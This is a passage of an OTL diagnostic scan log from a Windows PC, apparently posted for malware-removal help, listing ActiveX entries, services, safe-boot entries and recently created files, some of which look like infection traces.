ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:[b]64bit:[/b] {4FC4FAB8-DD2C-3F8B-B378-F6EF65C0EC05} - .NET Framework
ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - U
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -UserConfig
ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\System32\Rundll32.exe C:\Windows\System32\mscories.dll,Install
ActiveX:[b]64bit:[/b] {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\inf\unregmp2.exe /ShowWMP
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {54BDBDCB-ED26-30CA-BFFC-5B5E414C3793} - .NET Framework
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} -
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C6BAF60B-6E91-453F-BFF9-D3789CFEFCDD} - .NET Framework
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP

NetSvcs:[b]64bit:[/b] PushToInstall - C:\Windows\SysNative\PushToInstall.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] shpamsvc - C:\Windows\SysNative\Windows.SharedPC.AccountManager.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] XblGameSave - C:\Windows\SysNative\XblGameSave.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] NaturalAuthentication - C:\Windows\SysNative\NaturalAuth.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] TokenBroker - C:\Windows\SysNative\TokenBroker.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] lfsvc - C:\Windows\SysNative\lfsvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] XblAuthManager - C:\Windows\SysNative\XblAuthManager.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] DmEnrollmentSvc - C:\Windows\SysNative\Windows.Internal.Management.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] wisvc - C:\Windows\SysNative\FlightSettings.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] WpnService - C:\Windows\SysNative\wpnservice.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] XboxNetApiSvc - C:\Windows\SysNative\XboxNetApiSvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] UsoSvc - C:\Windows\SysNative\usocore.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] UserManager - C:\Windows\SysNative\usermgr.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] InstallService - C:\Windows\SysNative\InstallService.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] DsmSvc - C:\Windows\SysNative\DeviceSetupManager.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] NetSetupSvc - C:\Windows\SysNative\NetSetupSvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] NcaSvc - C:\Windows\SysNative\NcaSvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] wlidsvc - C:\Windows\SysNative\wlidsvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] XboxGipSvc - C:\Windows\SysNative\xboxgipsvc.dll (Microsoft Corporation)
NetSvcs:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
NetSvcs: TokenBroker - C:\Windows\SysWOW64\TokenBroker.dll (Microsoft Corporation)

SafeBootMin:[b]64bit:[/b] Ahcache.sys - C:\Windows\SysNative\drivers\ahcache.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] Base - Driver Group
SafeBootMin:[b]64bit:[/b] BasicDisplay.sys - C:\Windows\SysNative\drivers\BasicDisplay.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] BasicRender.sys - C:\Windows\SysNative\drivers\BasicRender.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] Boot Bus Extender - Driver Group
SafeBootMin:[b]64bit:[/b] Boot file system - Driver Group
SafeBootMin:[b]64bit:[/b] BrokerInfrastructure - C:\Windows\SysNative\bisrv.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] CoreMessagingRegistrar - C:\Windows\SysNative\CoreMessaging.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] EFS - C:\Windows\SysNative\efssvc.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] File system - Driver Group
SafeBootMin:[b]64bit:[/b] Filter - Driver Group
SafeBootMin:[b]64bit:[/b] HelpSvc - Service
SafeBootMin:[b]64bit:[/b] iai2c.sys - C:\Windows\SysNative\drivers\iai2c.sys (Intel(R) Corporation)
SafeBootMin:[b]64bit:[/b] KeyIso - C:\Windows\SysNative\keyiso.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] LSM - C:\Windows\SysNative\lsm.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] MBAMService - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe (Malwarebytes)
SafeBootMin:[b]64bit:[/b] Netlogon - C:\Windows\SysNative\netlogon.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] PCI Configuration - Driver Group
SafeBootMin:[b]64bit:[/b] PNP Filter - Driver Group
SafeBootMin:[b]64bit:[/b] Primary disk - Driver Group
SafeBootMin:[b]64bit:[/b] sacsvr - Service
SafeBootMin:[b]64bit:[/b] SCSI Class - Driver Group
SafeBootMin:[b]64bit:[/b] SerCx2.sys - C:\Windows\SysNative\drivers\SerCx2.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] SpbCx.sys - C:\Windows\SysNative\drivers\SpbCx.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] StateRepository - C:\Windows\SysNative\Windows.StateRepository.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] System Bus Extender - Driver Group
SafeBootMin:[b]64bit:[/b] SystemEventsBroker - C:\Windows\SysNative\SystemEventsBrokerServer.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] TBS - Service
SafeBootMin:[b]64bit:[/b] TileDataModelSvc - C:\Windows\SysNative\tileobjserver.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] uefi.sys - C:\Windows\SysNative\drivers\uefi.sys (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] UserManager - C:\Windows\SysNative\usermgr.dll (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] vmms - Service
SafeBootMin:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootMin:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootMin:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootMin:[b]64bit:[/b] {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage Devices
SafeBootMin:[b]64bit:[/b] {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host Controller
SafeBootMin:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootMin:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootMin:[b]64bit:[/b] {F2E7DD72-6468-4E36-B6F1-6488F42C1B52} - Firmware
SafeBootMin: Base - Driver Group
SafeBootMin: Boot Bus Extender - Driver Group
SafeBootMin: Boot file system - Driver Group
SafeBootMin: CoreMessagingRegistrar - C:\Windows\SysWOW64\CoreMessaging.dll (Microsoft Corporation)
SafeBootMin: File system - Driver Group
SafeBootMin: Filter - Driver Group
SafeBootMin: HelpSvc - Service
SafeBootMin: PCI Configuration - Driver Group
SafeBootMin: PNP Filter - Driver Group
SafeBootMin: Primary disk - Driver Group
SafeBootMin: sacsvr - Service
SafeBootMin: SCSI Class - Driver Group
SafeBootMin: StateRepository - C:\Windows\SysWOW64\Windows.StateRepository.dll (Microsoft Corporation)
SafeBootMin: System Bus Extender - Driver Group
SafeBootMin: TBS - Service
SafeBootMin: vmms - Service
SafeBootMin: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootMin: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootMin: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootMin: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootMin: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootMin: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootMin: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootMin: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootMin: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootMin: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootMin: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootMin: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootMin: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootMin: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootMin: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootMin: {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage Devices
SafeBootMin: {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host Controller
SafeBootMin: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootMin: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootMin: {F2E7DD72-6468-4E36-B6F1-6488F42C1B52} - Firmware

SafeBootNet:[b]64bit:[/b] Ahcache.sys - C:\Windows\SysNative\drivers\ahcache.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] AppMgmt - C:\Windows\SysNative\appmgmts.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] Base - Driver Group
SafeBootNet:[b]64bit:[/b] BasicDisplay.sys - C:\Windows\SysNative\drivers\BasicDisplay.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] BasicRender.sys - C:\Windows\SysNative\drivers\BasicRender.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] Boot Bus Extender - Driver Group
SafeBootNet:[b]64bit:[/b] Boot file system - Driver Group
SafeBootNet:[b]64bit:[/b] BrokerInfrastructure - C:\Windows\SysNative\bisrv.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] CoreMessagingRegistrar - C:\Windows\SysNative\CoreMessaging.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] EFS - C:\Windows\SysNative\efssvc.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] File system - Driver Group
SafeBootNet:[b]64bit:[/b] Filter - Driver Group
SafeBootNet:[b]64bit:[/b] HelpSvc - Service
SafeBootNet:[b]64bit:[/b] KeyIso - C:\Windows\SysNative\keyiso.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] LSM - C:\Windows\SysNative\lsm.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] MBAMService - C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe (Malwarebytes)
SafeBootNet:[b]64bit:[/b] Messenger - Service
SafeBootNet:[b]64bit:[/b] mrxsmb10 - Driver
SafeBootNet:[b]64bit:[/b] NDIS Wrapper - Driver Group
SafeBootNet:[b]64bit:[/b] NetBIOSGroup - Driver Group
SafeBootNet:[b]64bit:[/b] NetDDEGroup - Driver Group
SafeBootNet:[b]64bit:[/b] Netlogon - C:\Windows\SysNative\netlogon.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] netprofm - C:\Windows\SysNative\netprofmsvc.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] NetSetupSvc - C:\Windows\SysNative\NetSetupSvc.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] Network - Driver Group
SafeBootNet:[b]64bit:[/b] NetworkProvider - Driver Group
SafeBootNet:[b]64bit:[/b] PCI Configuration - Driver Group
SafeBootNet:[b]64bit:[/b] PNP Filter - Driver Group
SafeBootNet:[b]64bit:[/b] PNP_TDI - Driver Group
SafeBootNet:[b]64bit:[/b] Primary disk - Driver Group
SafeBootNet:[b]64bit:[/b] rdpencdd.sys - Driver
SafeBootNet:[b]64bit:[/b] rdsessmgr - Service
SafeBootNet:[b]64bit:[/b] sacsvr - Service
SafeBootNet:[b]64bit:[/b] SCSI Class - Driver Group
SafeBootNet:[b]64bit:[/b] SerCx2.sys - C:\Windows\SysNative\drivers\SerCx2.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] SmartcardSimulator - Driver
SafeBootNet:[b]64bit:[/b] SpbCx.sys - C:\Windows\SysNative\drivers\SpbCx.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] StateRepository - C:\Windows\SysNative\Windows.StateRepository.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] Streams Drivers - Driver Group
SafeBootNet:[b]64bit:[/b] System Bus Extender - Driver Group
SafeBootNet:[b]64bit:[/b] SystemEventsBroker - C:\Windows\SysNative\SystemEventsBrokerServer.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] TBS - Service
SafeBootNet:[b]64bit:[/b] TDI - Driver Group
SafeBootNet:[b]64bit:[/b] TileDataModelSvc - C:\Windows\SysNative\tileobjserver.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] uefi.sys - C:\Windows\SysNative\drivers\uefi.sys (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] UserManager - C:\Windows\SysNative\usermgr.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] VaultSvc - C:\Windows\SysNative\vaultsvc.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] VirtualSmartcardReader - Driver
SafeBootNet:[b]64bit:[/b] vmms - Service
SafeBootNet:[b]64bit:[/b] Wcmsvc - C:\Windows\SysNative\wcmsvc.dll (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] WinDefend - C:\Program Files\Windows Defender\MsMpEng.exe (Microsoft Corporation)
SafeBootNet:[b]64bit:[/b] WudfUsbccidDriver - Driver
SafeBootNet:[b]64bit:[/b] {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet:[b]64bit:[/b] {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet:[b]64bit:[/b] {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet:[b]64bit:[/b] {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet:[b]64bit:[/b] {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet:[b]64bit:[/b] {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet:[b]64bit:[/b] {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet:[b]64bit:[/b] {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet:[b]64bit:[/b] {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet:[b]64bit:[/b] {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet:[b]64bit:[/b] {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet:[b]64bit:[/b] {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet:[b]64bit:[/b] {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet:[b]64bit:[/b] {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet:[b]64bit:[/b] {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet:[b]64bit:[/b] {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers
SafeBootNet:[b]64bit:[/b] {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootNet:[b]64bit:[/b] {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootNet:[b]64bit:[/b] {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet:[b]64bit:[/b] {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootNet:[b]64bit:[/b] {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage Devices
SafeBootNet:[b]64bit:[/b] {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host Controller
SafeBootNet:[b]64bit:[/b] {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootNet:[b]64bit:[/b] {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootNet:[b]64bit:[/b] {F2E7DD72-6468-4E36-B6F1-6488F42C1B52} - Firmware
SafeBootNet: Base - Driver Group
SafeBootNet: Boot Bus Extender - Driver Group
SafeBootNet: Boot file system - Driver Group
SafeBootNet: CoreMessagingRegistrar - C:\Windows\SysWOW64\CoreMessaging.dll (Microsoft Corporation)
SafeBootNet: File system - Driver Group
SafeBootNet: Filter - Driver Group
SafeBootNet: HelpSvc - Service
SafeBootNet: Messenger - Service
SafeBootNet: mrxsmb10 - Driver
SafeBootNet: NDIS Wrapper - Driver Group
SafeBootNet: NetBIOSGroup - Driver Group
SafeBootNet: NetDDEGroup - Driver Group
SafeBootNet: Network - Driver Group
SafeBootNet: NetworkProvider - Driver Group
SafeBootNet: PCI Configuration - Driver Group
SafeBootNet: PNP Filter - Driver Group
SafeBootNet: PNP_TDI - Driver Group
SafeBootNet: Primary disk - Driver Group
SafeBootNet: rdpencdd.sys - Driver
SafeBootNet: rdsessmgr - Service
SafeBootNet: sacsvr - Service
SafeBootNet: SCSI Class - Driver Group
SafeBootNet: SmartcardSimulator - Driver
SafeBootNet: StateRepository - C:\Windows\SysWOW64\Windows.StateRepository.dll (Microsoft Corporation)
SafeBootNet: Streams Drivers - Driver Group
SafeBootNet: System Bus Extender - Driver Group
SafeBootNet: TBS - Service
SafeBootNet: TDI - Driver Group
SafeBootNet: VirtualSmartcardReader - Driver
SafeBootNet: vmms - Service
SafeBootNet: WudfUsbccidDriver - Driver
SafeBootNet: {36FC9E60-C465-11CF-8056-444553540000} - Universal Serial Bus controllers
SafeBootNet: {4D36E965-E325-11CE-BFC1-08002BE10318} - CD-ROM Drive
SafeBootNet: {4D36E967-E325-11CE-BFC1-08002BE10318} - DiskDrive
SafeBootNet: {4D36E969-E325-11CE-BFC1-08002BE10318} - Standard floppy disk controller
SafeBootNet: {4D36E96A-E325-11CE-BFC1-08002BE10318} - Hdc
SafeBootNet: {4D36E96B-E325-11CE-BFC1-08002BE10318} - Keyboard
SafeBootNet: {4D36E96F-E325-11CE-BFC1-08002BE10318} - Mouse
SafeBootNet: {4D36E972-E325-11CE-BFC1-08002BE10318} - Net
SafeBootNet: {4D36E973-E325-11CE-BFC1-08002BE10318} - NetClient
SafeBootNet: {4D36E974-E325-11CE-BFC1-08002BE10318} - NetService
SafeBootNet: {4D36E975-E325-11CE-BFC1-08002BE10318} - NetTrans
SafeBootNet: {4D36E977-E325-11CE-BFC1-08002BE10318} - PCMCIA Adapters
SafeBootNet: {4D36E97B-E325-11CE-BFC1-08002BE10318} - SCSIAdapter
SafeBootNet: {4D36E97D-E325-11CE-BFC1-08002BE10318} - System
SafeBootNet: {4D36E980-E325-11CE-BFC1-08002BE10318} - Floppy disk drive
SafeBootNet: {50DD5230-BA8A-11D1-BF5D-0000F805F530} - Smart card readers
SafeBootNet: {533C5B84-EC70-11D2-9505-00C04F79DEAF} - Volume shadow copy
SafeBootNet: {6BDD1FC1-810F-11D0-BEC7-08002BE2092F} - IEEE 1394 Bus host controllers
SafeBootNet: {71A27CDD-812A-11D0-BEC7-08002BE2092F} - Volume
SafeBootNet: {745A17A0-74D3-11D0-B6FE-00A0C90F57DA} - Human Interface Devices
SafeBootNet: {9DA2B80F-F89F-4A49-A5C2-511B085B9E8A} - Enhanced Storage Devices
SafeBootNet: {A0A588A4-C46F-4B37-B7EA-C82FE89870C6} - SDA Standard Compliant SD Host Controller
SafeBootNet: {D48179BE-EC20-11D1-B6B8-00C04FA372A7} - SBP2 IEEE 1394 Devices
SafeBootNet: {D94EE5D8-D189-4994-83D2-F68D7D41B0E6} - SecurityDevices
SafeBootNet: {F2E7DD72-6468-4E36-B6F1-6488F42C1B52} - Firmware

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2018/12/31 11:40:49 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Thinkcentre\Desktop\OTL.exe
[2018/12/31 11:33:46 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
[2018/12/31 11:33:43 | 000,152,184 | ---- | C] (Malwarebytes) -- C:\WINDOWS\SysNative\drivers\mbae64.sys
[2018/12/31 11:22:40 | 000,000,000 | ---D | C] -- C:\ProgramData\SWCUTemp
[2018/12/30 10:53:58 | 000,000,000 | ---D | C] -- C:\WINDOWS\SysNative\sstmp
[2018/12/29 21:42:47 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\Wii Party [SUPP01]
[2018/12/29 18:12:17 | 000,000,000 | ---D | C] -- C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
[2018/12/29 18:10:12 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Local\mbamtray
[2018/12/29 18:07:41 | 000,000,000 | ---D | C] -- C:\Program Files\Malwarebytes
[2018/12/29 18:04:01 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2018/12/29 10:21:22 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\SUPERAntiSpyware.com
[2018/12/29 10:19:28 | 000,000,000 | R--D | C] -- C:\Users\Thinkcentre\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[2018/12/26 11:43:11 | 000,000,000 | ---D | C] -- C:\ProgramData\{86C43796-BE37-00C5-4FA3-468C4F441FDD}
[2018/12/26 11:43:11 | 000,000,000 | ---D | C] -- C:\ProgramData\{04BD92B5-1B14-82BC-6C06-3F0E6CE1665F}
[2018/12/26 11:42:37 | 000,083,784 | ---- | C] (Microsoft Corporation) -- C:\ProgramData\vcruntime140.dll
[2018/12/26 11:42:36 | 001,246,160 | ---- | C] (Mozilla Foundation) -- C:\ProgramData\nss3.dll
[2018/12/26 11:42:36 | 000,144,848 | ---- | C] (Mozilla Foundation) -- C:\ProgramData\softokn3.dll
[2018/12/26 11:42:35 | 000,440,120 | ---- | C] (Microsoft Corporation) -- C:\ProgramData\msvcp140.dll
[2018/12/26 11:42:34 | 000,137,168 | ---- | C] (Mozilla Foundation) -- C:\ProgramData\mozglue.dll
[2018/12/26 11:42:33 | 000,334,288 | ---- | C] (Mozilla Foundation) -- C:\ProgramData\freebl3.dll
[2018/12/26 11:42:30 | 000,000,000 | ---D | C] -- C:\ProgramData\YPNSR4TP8FWAGC1OSLMM
[2018/12/23 18:10:11 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\Mario Party 9 [SSQP01]
[2018/12/23 14:17:36 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\camera
[2018/12/19 18:12:38 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\CC
[2018/12/19 15:54:01 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Local\You_Have_10_Secondsfinal
[2018/12/15 10:31:55 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Documents\Gameloft
[2018/12/14 18:44:41 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\Desktop\PROClient_64
[2018/12/05 14:47:19 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\Citra
[2018/12/05 14:46:40 | 000,000,000 | ---D | C] -- C:\Users\Thinkcentre\AppData\Roaming\windspro
